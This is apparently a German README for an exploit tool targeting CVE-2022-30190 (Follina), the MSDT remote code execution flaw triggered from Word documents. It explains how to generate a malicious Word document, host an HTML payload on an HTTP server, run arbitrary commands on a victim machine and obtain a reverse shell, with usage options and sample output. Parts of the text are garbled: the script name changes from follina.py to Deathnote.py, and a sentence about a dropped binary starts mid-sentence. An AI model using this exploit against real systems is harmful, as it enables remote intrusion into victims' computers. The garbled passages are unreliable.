
Proof of Concept für CVE-2022-30190
Eine Remotecodeausführungs-Schwachstelle liegt vor, wenn MSDT über das URL-Protokoll von einer aufrufenden Anwendung wie Word aufgerufen wird. Ein Angreifer, der diese Schwachstelle erfolgreich ausnutzt, kann beliebigen Code mit den Rechten der aufrufenden Anwendung ausführen. Der Angreifer kann dann Programme installieren, Daten anzeigen, ändern oder löschen oder neue Konten im Rahmen der Benutzerrechte erstellen.
Erstellen Sie einen „Deathnote“-MS-MSDT-Angriff mit einem bösartigen Microsoft Word-Dokument und stellen Sie eine Payload über einen HTTP-Server bereit.
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help show this help message and exit
--command COMMAND, -c COMMAND
command to run on the target (default: Notepad)
--output OUTPUT, -o OUTPUT
output maldoc file (default: ./Deathnote.doc)
--interface INTERFACE, -i INTERFACE
network interface or IP address to host the HTTP server (default: eth0)
--port PORT, -p PORT port to serve the HTTP server (default: 8000)
notepad.exe starten:
$ python3 Deathnote.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./Deathnote.doc
[+] serving html payload on :8000
calc.exe starten:
$ python3 Deathnote.py -c "calc"

C:\Windows\Tasks abgelegt. Die Binärdatei wird nicht aufgeräumt. Dies wird Antiviren-Erkennungen auslösen, sofern die Antivirensoftware nicht deaktiviert ist.Holen Sie sich reverse shell :
python3 Deathnote.py -p 1234